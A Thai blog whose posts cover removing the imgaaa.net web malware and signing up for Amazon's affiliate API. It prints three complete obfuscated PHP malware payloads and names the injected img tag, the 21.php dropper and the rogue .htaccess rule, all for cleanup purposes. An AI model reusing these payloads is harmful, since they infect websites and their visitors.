Written on 2:05 PM by ปั้มเงิน Cookie Run
วิธีแก้ Malware imgaaa.net ทั้ง Host แบบ Bash Shell
หลังจาก SV. ที่ทำงานติดไอเจ้า
imgaaa.net ทุกโดเมน ก็ทำให้กลายเป็นปัญหาใหญ่ที่จะแแก้ไขได้ด้วยมือเปล่าเลยมานั้นเขียน
Bash Shell ขึ้นมาใช้ซะเลย โดยหลักการทำงานไม่ยุ่งยากเท่าไร คือ
1. ให้ค้นหาไฟล์ทุกไฟล์ใน Directories
/home/ ทั้งหมด ทุก
directories ที่มีข้อความว่า
imgaaa.net
2. แสดงผลออกทางหน้าจอ จะได้รู้ด้วยว่าเจอไฟล์อะไรบ้าง
3. ขั้นตอนสำคัญเลยคือ
cat $file สั่งให้เปิดไฟล์ที่เจอ แล้ว
grep -v "imgaaa.net" แสดงผลโดยละเว้นหรือไม่ให้แดงบรรทัดที่มีคำว่า
imgaaa.net เสร็จแล้วให้ทำการสร้างไฟล์ใหม่ขึ้นมา
> $file.new; โดยลบบรรทัดนั้นออกไปแล้ว ต่อไปให้ทำการคัดลอก
cp -a $file.new $file; ไฟล์ที่ลบข้อความดังกล่าวไปแล้วทับไฟล์เดิมที่ติด
Malware imgaaa.net สุดท้ายลบ
rm -f $file.new; ไฟล์ที่ทำสำเนาตัวที่ลบข้อความ
Malware imgaaa.net เมื่อตอนแรกทิ้ง
#!/bin/bash
for file in $(grep -lr imgaaa.net /home/*)
do
echo "${file}";
cat $file | grep -v "imgaaa.net" > $file.new; cp -a $file.new $file; rm -f $file.new;
done
หุๆๆ สบายไหมล่ะ แต่ขอบอกว่ารันนานมากครับ และก็ไม่มีอะไรขึ้นเลยจนกว่าจะรันเสร็จ ก็ประมาณ 1-2 ชั่วโมงล่ะ ขึ้นอยู่กับ Host ว่ามีเว็บหรือไฟล์มากน้อยแค่ไหน
ไฟล์
Bash Shell ที่ผมสร้างผมตั้งชื่อว่า
imgaaa.net.sh แล้วพอเวลารันผมใช้
sh imgaaa.net.sh หรือแล้วแต่ ตระกูลของ
ยูนิกซ์ ด้วยล่ะ
Posted in
Bash,
imgaaa.net,
ยูนิกซ์
|
Written on 10:24 AM by ปั้มเงิน Cookie Run
ตัวอย่าง
Code Malware
imgaaa.net
โดยตัว Code จะถูกเข้ารหัสด้วย
base64encoded โดยตอนที่มันถูกเรียกทำงานมันจะทำการถอดรหัส แล้วใช้คำสั่ง
eval และ
gzuncompress เพื่อให้สามารถรันตัว Code ที่ถูกเข้ารหัสได้ โดย Code ของไฟล์ Malware imgaaa.net มีดังที่แสดงด้านล่าง
<? eval(gzuncompress(base64_decode('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'))); ?>
<? eval(gzuncompress(base64_decode('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'))); ?>
<? eval(gzuncompress(base64_decode('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'))); ?>
Posted in
imgaaa.net,
Malware
|
Written on 1:51 PM by ปั้มเงิน Cookie Run
ว่าด้วยเรื่อง เว็บมัลแวร์
imgaaa.net ซึ่งกำลังระบาดอยู่ในตอนนี้ เชื่อว่าหลายๆเว็บกำลังเจอกันอยู่จนทำให้เว็บไม่สามารถเข้าได้ผ่าน
Mozilla Firefox หรือ ถูกแจ้งว่าเป็นเว็บไซต์อันตรายจาก
Google ซึ่งลักษณะการทำงานของ
imgaaa.net จะมีลักษณะการทำงานเหมือน
trojan หรือ
sniffer ที่ค่อยดักข้อมูลการรับส่งผ่าน FTP ที่เรากำลังใช้งาน โดยเว็บหรือหน้าเพจที่ติด
เว็บมัลแวร์ ตัวนี้จะถูกแทรกด้วย Code
<img border="0" heigth="1" src="http://imgaaa.net/t.php?id=36910902" width="1" />
โดยวิธีการแก้ หรือ ตรวจหาเว็บมัลแวร์ imgaaa.net มีดังนี้
1. FTP เข้าสู่เว็บของท่าน
2. ทำการค้นหาไฟล์ "
21.php" ถ้ามีเมื่อเปิดดูจะพบ Code
<? eval(gzuncompress(base64_decode( ซึ่งมันจะทำการแพร่กระจายเว็บมัลแวร์ ดังกล่าวไปยังไฟล์ต่างๆ โดยไฟล์ที่โดนบ่อยคือไฟล์ Index.php,Index.html หรือ police.php ซึ่งมันจะทำการแทรก Code
<img border="0" heigth="1" src="http://imgaaa.net/t.php?id=36910902" width="1" /> ในบรรทัดสุดท้ายของไฟล์ที่โดน
3. วิธีการลบ หรือจัดการกับเว็บมัลแวร์ "
imgaaa.net" นั้นทำได้โดยง่าย คือลบ Code ดังกล่าวออกไป หรือจะอัพโหลด ไฟล์เก่าที่มีขึ้นไปแทนก็ได้ แต่คนที่สามารถ
PuTTY ไปที่ SV. ได้นั้น สามารถใช้คำสั่ง
grep -lr imgaaa.net เพื่อทำการค้นหาไฟล์ที่ติดเว็บมัลแวร์ตัวนี้ได้ ซึ่งมันน่าจะสะดวกกว่าการเปิดหาเองทีละไฟล์
4. สุดท้ายถ้าเว็บคุณมีไฟล์ “.htaccess” อย่าลืมลองเปิดดูว่ามี Code
RewriteRule ^(.*)$ /wp-admin/21.php?q=$1 อยู่หรือไม่ หากมีให้ลบออกไป เพราะไม่งั้นเว็บของคุณ อาจจะเข้าใช้งานไม่ได้ครับ
คำแนะนำ
สำหรับคนที่ใช้ CMS สำเร็จรูปควรมีการอัพเดพระบบอยู่เสมอ เพื่อแก้ไขช่องโหว่ต่างๆที่ถูกพบ และในกรณีที่ติด เว็บมัลแวร์ ไปแล้วก็ควรรีบแก้ปัญหาและเปลี่ยนรหัสผ่านการเข้าใช้ FTP ทันที เพราะเว็บมัลแวร์อาจเข้ามาแพร่กระจ่ายต่อผ่าน FTP ที่ตุณเข้าใช้ก็ได้....
Posted in
grep,
imgaaa.net,
เว็บมัลแวร์
|
Written on 9:41 PM by ปั้มเงิน Cookie Run
วิธีสมัคร Amazon API หรือ Product Advertising API
วันนี้ผมจะเสนอวิธีการสมัคร
Amazon API หรือ
Product Advertising API สำหรับคนที่สนใจจะหารายได้กับ Amazon ให้มือใหม่ได้เป็นตัวอย่าง เพราะถ้าไม่นำเสนอวิธีการสมัครในครั้ง ผมเชื่อว่าคงมีอีกหลายๆ ท่านคงสับสน หรือ งง ไปเลย เพราะครั้งแรกที่ผมเริ่มทำก็งมทางอยู่นานเช่นกันครับ
Amazon API คือออะไร ทำไมต้องสมัคร เพื่อขอ
Access Key ID และ
Secret Access Key ถ้าพูดแบบเป็นหลักการเพื่อนๆคงงงกันแน่ งั้นเรามาพูดแบบชาวบ้านกัน กล่าวคือ
Amazon API คือ ตัวกลางที่เราจะใช้เพื่อดึงข้อมูล ต่างๆ หรือสินค้า จาก
Amazon เพื่อมาแสดงที่เว็บที่เราทำ แทนการโพสหรือ Copy เนื้อหาด้วยมือมาลงนั้นเอง หุๆ ขอบอกสะดวกมากมายเลยล่ะ เพราะมีโปรแกรม, plugin, หรือชุดคำสั่งมากมาย ที่เพียงเรานำข้อมูล
Amazon API มาใส่ แล้วตั้งค่านิดหน่อย ระบบก็ต้องค่อยๆนำสินค้ามากมายมาลงยังเว็บเรา ฮ่าๆ อย่างสมัครกันแล้วล่ะสิ งั้นเรามาเข้าสู่ขั้นตอนการสมัคร
Amazon API กันเลย
ขั้นตอนการสมัคร Amazon API กันเลย
1. ไปที่ Amazon Web Services หรือ
https://aws-portal.amazon.com/gp/aws/developer/registration/index.html
แล้วใส่ ใส่ username, password ที่เราได้สมัคร Amazon Associates ในครั้งก่อน
2. ใส่เว็บไซต์เราเข้า และรายระเอียดของเว็บที่เราจะใช้ Amazon API (ที่จริงเว็บอะไรก็ได้ แต่เว็บที่เราใช้ล่ะดีที่สุด กันโดนตรวจสอบ) เมื่อใส่ข้อมูลให้ครบ แล้วกด ปุ่ม complete registation
3. และจะมาสู่หน้านี้ ให้เลือก Manage Your Account
4. หน้านี้มา ให้เลือกหัวข้อ Access Identifiers กดคำว่า Click here
5. จะมาสู่หน้า Access Credentials ให้คลิก Show ในช่อง Secret Access Key และเราก็จะได้ค่าของ Amazon API คือ Access Key ID และ Secret Access Key
6. ทำการจดบันทึกไว้ หรือจะกลับเขามาดูภายหลังก็ได้ครับที่ต้องการ เสร็จแล้วครับ กับ วิธีสมัคร Amazon API หรือ Product Advertising API
Posted in
Access Key ID,
Amazon,
Amazon API,
Amazon Associates,
Secret Access Key
|
Written on 10:17 PM by ปั้มเงิน Cookie Run
วิธีสมัคร Amazon Associates เพื่อเริ่มหารายได้
1. ไปที่เว็บไซด์ https://affiliate-program.amazon.com
2. เลือกที่
I am a new customer. แล้วกรอกอีเมล์ของเราลงไป เสร็จแล้วคลิ๊กที่ปุ่มเหลือง ๆ
(Sign in using secure server )
3. กรอกข้อมูลส่วนตัวชื่อและพาสเวิร์ด ให้ครบทุกช่องแล้วคลิก Continue. ง่ายๆ ครับคงไม่ต้องบรรยาย
4.
กรอกให้ครบทุกช่องครับ เช่น
